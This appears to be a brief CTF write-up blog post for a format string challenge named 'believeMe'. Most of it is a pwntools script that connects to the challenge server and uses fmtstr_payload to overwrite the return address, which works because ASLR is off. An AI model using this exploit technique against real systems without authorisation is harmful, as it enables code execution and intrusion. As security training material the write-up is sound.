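Format string
Ugh, the blog blew up. Everything I wrote before is gone and I can't be bothered to write it all again; this blog is such a pain. So I'll just post the writeup. The approach is to leak the ret address remotely, because ASLR is not enabled.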
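from pwn import *
context.log_level='debug'
elf = ELF('./believeMe.dms')
libc = elf.libc
p = remote('18.223.228.52',13337)
#p = process('./believeMe.dms')  # local run instead of the remote service
# Format string argument offset is 9; 0xffffdd2c is the leaked location of the
# return address (stable because ASLR is off), overwritten with 0x804867b
# using two-byte (%hn) writes.
payload = fmtstr_payload(9,{0xffffdd2c:0x804867b},write_size='short')
p.sendline(payload)
p.interactive()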